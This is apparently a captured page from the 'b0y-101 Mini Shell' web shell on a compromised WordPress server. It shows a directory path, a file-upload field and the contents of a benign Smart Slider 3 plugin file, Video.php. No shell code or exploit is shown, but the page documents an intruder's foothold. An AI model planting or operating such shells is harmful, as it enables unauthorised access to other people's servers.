b0y-101 Mini Shell


Current Path : E:/www/km/wp2/wp-content/plugins/smart-slider-3/Nextend/Framework/Form/Element/Text/
File Upload :
Current File : E:/www/km/wp2/wp-content/plugins/smart-slider-3/Nextend/Framework/Form/Element/Text/Video.php

<?php


namespace Nextend\Framework\Form\Element\Text;


use Nextend\Framework\Browse\BrowseManager;

class Video extends FieldImage {

    protected function fetchElement() {

        BrowseManager::enqueue($this->getForm());

        $html = parent::fetchElement();

        return $html;
    }
}

Copyright © 2019 by b0y-101